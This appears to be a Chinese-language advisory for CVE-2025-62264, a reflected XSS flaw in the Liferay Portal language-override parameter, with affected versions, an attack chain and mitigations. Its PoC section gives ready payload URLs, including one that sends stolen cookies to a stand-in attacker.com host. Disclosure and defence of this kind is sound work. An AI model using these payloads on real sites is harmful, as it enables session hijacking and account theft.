CVE-2025-62264 Liferay Portal 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62264

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Liferay Portal, Liferay DXP

漏洞概述

CVE-2025-62264是Liferay Portal和Liferay DXP中存在的反射型跨站脚本(XSS)漏洞。该漏洞位于语言覆盖(Language Override)功能中，攻击者可以通过构造恶意的`_com_liferay_portal_language_override_web_internal_portlet_PLOPortlet_selectedLanguageId`参数值来注入任意Web脚本或HTML代码。由于是反射型XSS，恶意脚本会随着用户点击特制链接而执行，可能导致会话劫持、敏感信息窃取或对用户浏览器进行恶意操作。该漏洞无需认证即可利用，但需要用户交互(如点击恶意链接)才能触发。CVSS评分6.1，属于中等严重程度。

技术细节

该漏洞属于反射型跨站脚本攻击(RXSS)。攻击者构造包含恶意JavaScript代码的URL参数`_com_liferay_portal_language_override_web_internal_portlet_PLOPortlet_selectedLanguageId`，当受害者在已登录状态下访问该恶意链接时，服务器将未经正确过滤的参数值直接反射回HTML响应中。浏览器将恶意代码解析为合法脚本并执行，从而绕过同源策略限制。由于该参数位于语言选择功能中，攻击者可以窃取用户会话Cookie、劫持用户账户或执行其他客户端操作。攻击成功的关键在于服务器端对用户输入缺乏适当的输出编码或输入验证。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Liferay Portal版本，确认其属于受影响版本范围(7.4.3.8-7.4.3.111或DXP 2023.Q3/Q4系列)

STEP 2

步骤2: 构造恶意链接

攻击者构造包含XSS payload的URL，将恶意脚本注入到_selectedLanguageId参数中，如: "><script>alert(document.domain)</script>

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、即时通讯或其他渠道诱导已登录用户点击特制链接

STEP 4

步骤4: XSS执行

用户点击链接后，服务器将未经过滤的参数值反射回页面，浏览器执行注入的恶意脚本

STEP 5

步骤5: 敏感信息窃取

恶意脚本可窃取用户会话Cookie、劫持账户、执行未授权操作或重定向用户到钓鱼页面

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62264 PoC - Reflected XSS in Liferay Portal -->
<!-- Target: Liferay Portal Language Override Feature -->
<!-- Affected Parameter: _com_liferay_portal_language_override_web_internal_portlet_PLOPortlet_selectedLanguageId -->

<!-- Basic PoC - Steal cookies -->
https://target-liferay.com/web/guest/home?p_p_id=PLOPortlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&_com_liferay_portal_language_override_web_internal_portlet_PLOPortlet_selectedLanguageId="><script>alert(document.cookie)</script>

<!-- Advanced PoC - Cookie Theft with exfiltration -->
<!-- Note: Modify the URL and attacker-controlled server before use -->
const pocUrl = 'https://target-liferay.com/web/guest/home?p_p_id=PLOPortlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&_com_liferay_portal_language_override_web_internal_portlet_PLOPortlet_selectedLanguageId="><script>fetch("https://attacker.com/steal?c="+btoa(document.cookie))</script>';

<!-- HTML Injection variant -->
https://target-liferay.com/web/guest/home?p_p_id=PLOPortlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&_com_liferay_portal_language_override_web_internal_portlet_PLOPortlet_selectedLanguageId="><img src=x onerror="alert('XSS Triggered')">

影响范围

Liferay Portal 7.4.3.8 - 7.4.3.111

Liferay DXP 2023.Q4.0 - 2023.Q4.10

Liferay DXP 2023.Q3.1 - 2023.Q3.10

Liferay DXP 7.4 update 4 - update 92

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)使用WAF对XSS特征字符进行过滤和阻断；2)限制语言选择功能的访问范围；3)启用HttpOnly和Secure标志保护Cookie；4)对管理员和用户进行安全意识培训，警惕陌生链接；5)监控日志中的可疑XSS攻击特征；6)考虑临时禁用语言覆盖功能直到完成升级。